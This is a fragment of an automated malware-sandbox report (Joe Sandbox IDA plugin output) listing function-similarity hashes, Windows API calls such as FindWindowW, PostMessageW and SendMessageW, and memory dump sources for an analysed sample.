• Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 28898d48f25f73d09cc2c72433af89364f5d27bd1f590245d2fa66cdf56f43c2
• Instruction ID: 27e9b4030ebaf0a699ef9284a2ecbebaccb3481acd841bbf9601473cafa92951
• Opcode Fuzzy Hash: 28898d48f25f73d09cc2c72433af89364f5d27bd1f590245d2fa66cdf56f43c2
• Instruction Fuzzy Hash: 99D0C975785311B6EBA4BB70AC1BFD66A56AB10B50F04192AB34AAA1D0C9E49800C658
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006D59AE
• PostMessageW.USER32(00000000), ref: 006D59B5
  • Part of subcall function 006B5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006B52BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
• Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 914e3a794410a4aa8cfe54e58c80ba36ba878fff0500f539659896b421243f24
• Instruction ID: fbb26d8d97b5b0180dfbd4a95fd196c202f397aabdf0d94d428359c607df14a8
• Opcode Fuzzy Hash: 914e3a794410a4aa8cfe54e58c80ba36ba878fff0500f539659896b421243f24
• Instruction Fuzzy Hash: 01D0C971782311BAEBA4BB70AC0BFD66656AB14B50F04192AB346EA1D0C9E4A800C658
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 006A93E9
• SendMessageW.USER32(00000000,00001200,00000000,00000000), ref: 006A93F7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
• Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
Similarity
• API ID: MessageSend
• String ID: @U=u
• API String ID: 3850602802-2594219639
• Opcode ID: f85d346602e754441b391828d66f982930cec315e1ff2fac421241d32af4a418
• Instruction ID: 7819d8f956c08c9c5b5d66b47f0046121c0e3428924c848a3be66a2b927eeb29
• Opcode Fuzzy Hash: f85d346602e754441b391828d66f982930cec315e1ff2fac421241d32af4a418
• Instruction Fuzzy Hash: 03C002315421C0BAEB211B77AC0DD873E3EE7CBF52711516DB212954B586654095D624